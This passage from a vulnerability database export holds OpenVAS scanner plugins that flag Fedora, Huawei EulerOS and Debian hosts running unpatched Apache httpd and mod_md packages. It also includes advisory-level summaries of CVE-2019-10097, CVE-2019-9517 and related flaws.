vulnerable package version is\n present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This module manages common properties of\n domains for one or more virtual hosts. Specifically it can use the ACME protocol\n (RFC Draft) to automate certificate provisioning. These will be configured for\n managed domains and their virtual hosts automatically. This includes renewal of\n certificates before they expire.\");\n\n script_tag(name:\"affected\", value:\"'mod_md' package(s) on Fedora 30.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC30\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"mod_md\", rpm:\"mod_md~2.0.8~2.fc30\", rls:\"FC30\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-10-02T14:37:23", "description": "The remote host is missing an update for the\n ", "cvss3": {}, "published": "2019-08-23T00:00:00", "type": "openvas", "title": "Fedora Update for httpd FEDORA-2019-099575a123", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-10098", "CVE-2019-10097", "CVE-2019-10092"], "modified": "2019-10-02T00:00:00", "id": "OPENVAS:1361412562310876711", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876711", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876711\");\n script_version(\"2019-10-02T07:08:50+0000\");\n script_cve_id(\"CVE-2019-10098\", \"CVE-2019-10092\", \"CVE-2019-10097\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-10-02 07:08:50 +0000 (Wed, 02 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-08-23 02:24:03 +0000 (Fri, 23 Aug 2019)\");\n script_name(\"Fedora Update for httpd FEDORA-2019-099575a123\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC30\");\n\n script_xref(name:\"FEDORA\", value:\"2019-099575a123\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7RVHJHTU4JN3ULCQ44F2G6LZBF2LGNTC\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the\n 'httpd' package(s) announced via the FEDORA-2019-099575a123 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is\n present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The Apache HTTP Server is a powerful, efficient,\n and extensible web server.\");\n\n script_tag(name:\"affected\", value:\"'httpd' package(s) on Fedora 30.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC30\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.4.41~1.fc30\", rls:\"FC30\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-10-02T14:39:34", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-10-01T00:00:00", "type": "openvas", "title": "Fedora Update for mod_md FEDORA-2019-e00c65ec6f", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-10098", "CVE-2019-10097", "CVE-2019-10092"], "modified": "2019-10-01T00:00:00", "id": "OPENVAS:1361412562310876859", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876859", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876859\");\n script_version(\"2019-10-01T10:38:58+0000\");\n script_cve_id(\"CVE-2019-10098\", \"CVE-2019-10092\", \"CVE-2019-10097\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-10-01 10:38:58 +0000 (Tue, 01 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-10-01 02:25:36 +0000 (Tue, 01 Oct 2019)\");\n script_name(\"Fedora Update for mod_md FEDORA-2019-e00c65ec6f\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC29\");\n\n script_xref(name:\"FEDORA\", value:\"2019-e00c65ec6f\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XADU57XODT5FG4Q2UKBR6ZDM4LVYF3XR\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mod_md'\n package(s) announced via the FEDORA-2019-e00c65ec6f advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This module manages common properties of domains for one or more\nvirtual hosts. Specifically it can use the ACME protocol (RFC Draft)\nto automate certificate provisioning. These will be configured for\nmanaged domains and their virtual hosts automatically. This includes\nrenewal of certificates before they expire.\");\n\n script_tag(name:\"affected\", value:\"'mod_md' package(s) on Fedora 29.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC29\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"mod_md\", rpm:\"mod_md~2.0.8~3.fc29\", rls:\"FC29\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-10-02T14:39:34", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-10-01T00:00:00", "type": "openvas", "title": "Fedora Update for httpd FEDORA-2019-e00c65ec6f", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-10098", "CVE-2019-10097", "CVE-2019-10092"], "modified": "2019-10-01T00:00:00", "id": "OPENVAS:1361412562310876862", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876862", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876862\");\n script_version(\"2019-10-01T10:38:58+0000\");\n script_cve_id(\"CVE-2019-10098\", \"CVE-2019-10092\", \"CVE-2019-10097\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-10-01 10:38:58 +0000 (Tue, 01 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-10-01 02:25:39 +0000 (Tue, 01 Oct 2019)\");\n script_name(\"Fedora Update for httpd FEDORA-2019-e00c65ec6f\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC29\");\n\n script_xref(name:\"FEDORA\", value:\"2019-e00c65ec6f\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4D7F2KSXHKQ4Q65CCDUQLUXR6XYIGAZ2\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the FEDORA-2019-e00c65ec6f advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The Apache HTTP Server is a powerful, efficient, and extensible\nweb server.\");\n\n script_tag(name:\"affected\", value:\"'httpd' package(s) on Fedora 29.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC29\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.4.41~1.fc29\", rls:\"FC29\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-02-26T20:52:26", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-02-25T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for httpd (EulerOS-SA-2020-1155)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-10082", "CVE-2019-10081", "CVE-2019-9517", "CVE-2019-10097", "CVE-2018-17199"], "modified": "2020-02-25T00:00:00", "id": "OPENVAS:1361412562311220201155", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220201155", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2020.1155\");\n script_version(\"2020-02-25T13:57:14+0000\");\n script_cve_id(\"CVE-2018-17199\", \"CVE-2019-10081\", \"CVE-2019-10082\", \"CVE-2019-10097\", \"CVE-2019-9517\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-02-25 13:57:14 +0000 (Tue, 25 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-02-25 13:57:14 +0000 (Tue, 25 Feb 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for httpd (EulerOS-SA-2020-1155)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP8\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2020-1155\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1155\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'httpd' package(s) announced via the EulerOS-SA-2020-1155 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"In Apache HTTP Server 2.4.32-2.4.39, when mod_remoteip was configured to use a trusted intermediary proxy server using the 'PROXY' protocol, a specially crafted PROXY header could trigger a stack buffer overflow or NULL pointer deference. This vulnerability could only be triggered by a trusted proxy and not by untrusted HTTP clients.(CVE-2019-10097)\n\nSome HTTP/2 implementations are vulnerable to unconstrained internal data buffering, potentially leading to a denial of service. The attacker opens the HTTP/2 window so the peer can send without constraint, however, they leave the TCP window closed so the peer cannot actually write (many of) the bytes on the wire. The attacker then sends a stream of requests for a large response object. Depending on how the servers queue the responses, this can consume excess memory, CPU, or both.(CVE-2019-9517)\n\nHTTP/2 (2.4.20 through 2.4.39) very early pushes, for example configured with 'H2PushResource', could lead to an overwrite of memory in the pushing request's pool, leading to crashes. The memory copied is that of the configured push link header values, not data supplied by the client.(CVE-2019-10081)\n\nIn Apache HTTP Server 2.4.18-2.4.39, using fuzzed network input, the http/2 session handling could be made to read memory after being freed, during connection shutdown.(CVE-2019-10082)\n\nIn Apache HTTP Server 2.4 release 2.4.37 and prior, mod_session checks the session expiry time before decoding the session. This causes session expiry time to be ignored for mod_session_cookie sessions since the expiry time is loaded when the session is decoded.(CVE-2018-17199)\");\n\n script_tag(name:\"affected\", value:\"'httpd' package(s) on Huawei EulerOS V2.0SP8.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP8\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.4.34~8.h11.eulerosv2r8\", rls:\"EULEROS-2.0SP8\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.4.34~8.h11.eulerosv2r8\", rls:\"EULEROS-2.0SP8\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd-filesystem\", rpm:\"httpd-filesystem~2.4.34~8.h11.eulerosv2r8\", rls:\"EULEROS-2.0SP8\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.4.34~8.h11.eulerosv2r8\", rls:\"EULEROS-2.0SP8\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.4.34~8.h11.eulerosv2r8\", rls:\"EULEROS-2.0SP8\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mod_session\", rpm:\"mod_session~2.4.34~8.h11.eulerosv2r8\", rls:\"EULEROS-2.0SP8\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.4.34~8.h11.eulerosv2r8\", rls:\"EULEROS-2.0SP8\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-04-03T17:10:53", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-04-01T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for httpd (EulerOS-SA-2020-1359)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-10082", "CVE-2019-10081", "CVE-2019-9517", "CVE-2019-10097", "CVE-2018-17199"], "modified": "2020-04-01T00:00:00", "id": "OPENVAS:1361412562311220201359", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220201359", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2020.1359\");\n script_version(\"2020-04-01T13:54:48+0000\");\n script_cve_id(\"CVE-2018-17199\", \"CVE-2019-10081\", \"CVE-2019-10082\", \"CVE-2019-10097\", \"CVE-2019-9517\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-04-01 13:54:48 +0000 (Wed, 01 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-04-01 13:54:48 +0000 (Wed, 01 Apr 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for httpd (EulerOS-SA-2020-1359)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRTARM64-3\\.0\\.6\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2020-1359\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1359\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'httpd' package(s) announced via the EulerOS-SA-2020-1359 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"In Apache HTTP Server 2.4 release 2.4.37 and prior, mod_session checks the session expiry time before decoding the session. This causes session expiry time to be ignored for mod_session_cookie sessions since the expiry time is loaded when the session is decoded.(CVE-2018-17199)\n\nIn Apache HTTP Server 2.4.18-2.4.39, using fuzzed network input, the http/2 session handling could be made to read memory after being freed, during connection shutdown.(CVE-2019-10082)\n\nHTTP/2 (2.4.20 through 2.4.39) very early pushes, for example configured with 'H2PushResource', could lead to an overwrite of memory in the pushing request's pool, leading to crashes. The memory copied is that of the configured push link header values, not data supplied by the client.(CVE-2019-10081)\n\nSome HTTP/2 implementations are vulnerable to unconstrained internal data buffering, potentially leading to a denial of service. The attacker opens the HTTP/2 window so the peer can send without constraint, however, they leave the TCP window closed so the peer cannot actually write (many of) the bytes on the wire. The attacker then sends a stream of requests for a large response object. Depending on how the servers queue the responses, this can consume excess memory, CPU, or both.(CVE-2019-9517)\n\nIn Apache HTTP Server 2.4.32-2.4.39, when mod_remoteip was configured to use a trusted intermediary proxy server using the 'PROXY' protocol, a specially crafted PROXY header could trigger a stack buffer overflow or NULL pointer deference. This vulnerability could only be triggered by a trusted proxy and not by untrusted HTTP clients.(CVE-2019-10097)\");\n\n script_tag(name:\"affected\", value:\"'httpd' package(s) on Huawei EulerOS Virtualization for ARM 64 3.0.6.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRTARM64-3.0.6.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.4.34~8.h11.eulerosv2r8\", rls:\"EULEROSVIRTARM64-3.0.6.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd-filesystem\", rpm:\"httpd-filesystem~2.4.34~8.h11.eulerosv2r8\", rls:\"EULEROSVIRTARM64-3.0.6.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.4.34~8.h11.eulerosv2r8\", rls:\"EULEROSVIRTARM64-3.0.6.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.4.34~8.h11.eulerosv2r8\", rls:\"EULEROSVIRTARM64-3.0.6.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-08-27T12:50:06", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-08-27T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 4509-1 (apache2 - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-10098", "CVE-2019-10082", "CVE-2019-10081", "CVE-2019-9517", "CVE-2019-10097", "CVE-2019-10092"], "modified": "2019-08-27T00:00:00", "id": "OPENVAS:1361412562310704509", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704509", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704509\");\n script_version(\"2019-08-27T02:00:12+0000\");\n script_cve_id(\"CVE-2019-10081\", \"CVE-2019-10082\", \"CVE-2019-10092\", \"CVE-2019-10097\", \"CVE-2019-10098\", \"CVE-2019-9517\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-08-27 02:00:12 +0000 (Tue, 27 Aug 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-08-27 02:00:12 +0000 (Tue, 27 Aug 2019)\");\n script_name(\"Debian Security Advisory DSA 4509-1 (apache2 - security update)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(9|10)\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2019/dsa-4509.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DSA-4509-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'apache2'\n package(s) announced via the DSA-4509-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Several vulnerabilities have been found in the Apache HTTPD server.\n\nCVE-2019-9517\nJonathan Looney reported that a malicious client could perform a\ndenial of service attack (exhausting h2 workers) by flooding a\nconnection with requests and basically never reading responses on\nthe TCP connection.\n\nCVE-2019-10081\nCraig Young reported that HTTP/2 PUSHes could lead to an overwrite\nof memory in the pushing request's pool, leading to crashes.\n\nCVE-2019-10082\nCraig Young reported that the HTTP/2 session handling could be made\nto read memory after being freed, during connection shutdown.\n\nCVE-2019-10092\nMatei Mal Badanoiu reported a limited cross-site scripting\nvulnerability in the mod_proxy error page.\n\nCVE-2019-10097\nDaniel McCarney reported that when mod_remoteip was configured to\nuse a trusted intermediary proxy server using the PROXY\nprotocol,\na specially crafted PROXY header could trigger a stack buffer\noverflow or NULL pointer deference. This vulnerability could only be\ntriggered by a trusted proxy and not by untrusted HTTP clients. The\nissue does not affect the stretch release.\n\nCVE-2019-10098\nYukitsugu Sasaki reported a potential open redirect vulnerability in\nthe mod_rewrite module.\");\n\n script_tag(name:\"affected\", value:\"'apache2' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For the oldstable distribution (stretch), these problems have been fixed\nin version 2.4.25-3+deb9u8.\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 2.4.38-3+deb10u1.\n\nWe recommend that you upgrade your apache2 packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"apache2\", ver:\"2.4.25-3+deb9u8\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2-bin\", ver:\"2.4.25-3+deb9u8\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2-data\", ver:\"2.4.25-3+deb9u8\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2-dbg\", ver:\"2.4.25-3+deb9u8\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2-dev\", ver:\"2.4.25-3+deb9u8\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.4.25-3+deb9u8\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"apache2-ssl-dev\", ver:\"2.4.25-3+deb9u8\", 